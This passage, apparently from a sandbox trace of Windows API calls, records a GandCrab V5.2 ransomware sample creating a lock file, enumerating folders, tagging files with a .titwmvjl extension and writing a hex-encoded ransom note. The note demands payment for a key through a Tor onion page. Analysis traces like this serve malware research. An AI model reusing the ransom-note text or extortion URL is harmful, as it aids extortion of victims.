param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 67 [0096.262] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0096.265] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.265] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.265] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0096.265] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0096.265] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503638 [0096.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.265] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.266] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.266] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.266] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.266] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock" [0096.266] lstrlenW (lpString=".titwmvjl") returned 9 [0096.266] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 67 [0096.266] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.266] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 76 [0096.267] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 67 [0096.267] lstrlenW (lpString=".lock") returned 5 [0096.267] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.267] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.267] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.267] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.267] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.267] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0096.267] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0096.267] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0096.268] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0096.268] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.269] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.269] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.269] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.269] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.269] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\TITWMVJL-DECRYPT.txt") returned 82 [0096.270] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0096.270] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\